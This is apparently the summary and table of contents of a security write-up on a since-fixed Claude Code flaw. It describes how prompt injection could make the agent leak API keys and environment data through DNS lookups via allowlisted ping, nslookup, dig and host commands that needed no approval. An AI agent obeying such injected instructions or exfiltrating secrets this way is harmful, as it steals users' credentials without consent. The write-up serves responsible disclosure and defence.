A security researcher discovered a high-severity vulnerability in Claude Code that allowed attackers to hijack the AI assistant through prompt injection and exfiltrate sensitive data like API keys via DNS requests. The attack exploited allowlisted bash commands (ping, nslookup, dig, host) that didn't require user approval, enabling data extraction from local files and environment variables without consent. Anthropic quickly fixed the issue by removing these commands from the allowlist after responsible disclosure.
Table of contents
Prompt Injection Hijacks ClaudeBackground and How It Was DiscoveredBuilding the Proof-of-ConceptPrompt Injection SourcesRecommended MitigationFull Video WalkthroughResponsible DisclosureConclusionReferencesSort: